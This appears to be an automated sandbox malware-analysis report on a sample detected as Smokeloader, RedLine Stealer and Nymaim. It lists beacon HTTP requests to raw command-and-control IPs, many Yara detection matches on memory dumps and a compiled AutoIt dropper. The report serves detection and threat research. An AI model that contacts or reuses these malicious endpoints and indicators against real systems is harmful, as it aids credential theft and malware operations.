Source: global traffic	HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, /;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, ;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, ;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache

Source: unknown

HTTPS traffic detected: 148.251.234.83:443 -> 192.168.2.6:49712 version: TLS 1.2

E-Banking Fraud

Yara detected Nymaim

Source: Yara match	File source: 0.0.file.exe.21d0e67.30.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.18.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.26.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.16.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.30.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.28.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.31.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.26.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.11.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.21.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.24.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.32.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.10.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.10.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.32.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.29.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.28.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.20.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.18.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.20.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.12.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.22.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.19.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.22.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.25.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.15.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.17.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.file.exe.2210000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.27.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.12.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.400000.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.file.exe.21d0e67.16.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279758880.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256985084.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260710969.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284332741.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279213027.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242004728.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261380699.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.285645764.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.241291964.0000000002210000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265965257.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.242584776.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.265443636.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.249185873.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.248750615.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.256511336.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252969697.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.252332121.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.249294032.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.242144552.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.256623914.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.257076195.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.248840662.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.280078685.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.279883585.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.284940570.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.252473091.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.248974366.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.260888078.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.242858773.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.249420938.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.279479542.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.279352370.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.252652451.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.242267138.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.256739991.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.284571510.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.267422154.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.266223376.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.253125485.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.265525344.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.261862995.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.242671157.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.285927973.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.261685846.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000000.260976008.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.253211211.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000000.257226679.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown

Binary is likely a compiled AutoIt script file

Source: file.exe, 00000000.00000003.332954672.0000000003939000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: file.exe, 00000000.00000003.330580383.0000000003938000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: file.exe, 00000000.00000003.329019305.0000000003B47000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: soft[1].0.dr	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r
Source: Cleaner.exe.0.dr	String found in binary or memory: S D S O F T W A R E \ C l a s s e s \ \ C L S I D \ \ \ I P C $ This is a third-party compiled AutoIt script. " r u n a s E r r o r a l l o c a t i n g m e m o r y . S e A s s i g n P r i m a r y T o k e n P r i v i l e g e S e I n c r e a s e Q u o t a P r i v i l e g e S e B a c k u p P r i v i l e g e S e R e s t o r e P r i v i l e g e w i n s t a 0 d e f a u l t w i n s t a 0 \ d e f a u l t C o m b o B o x L i s t B o x \| S H E L L D L L _ D e f V i e w l a r g e i c o n s d e t a i l s s m a l l i c o n s l i s t C L A S S C L A S S N N R E G E X P C L A S S I D N A M E X Y W H I N S T A N C E T E X T % s % u % s % d L A S T [ L A S T A C T I V E [ A C T I V E H A N D L E = [ H A N D L E : R E G E X P = [ R E G E X P T I T L E : C L A S S N A M E = [ C L A S S : A L L [ A L L ] H A N D L E R E G E X P T I T L E T I T L E T h u m b n a i l C l a s s A u t o I t 3 G U I C o n t a i n e r

Source: file.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 00000000.00000000.286250062.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.249294032.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.242144552.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.256623914.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000000.265693702.00000000021D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000000.257076195.00000000005B8000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
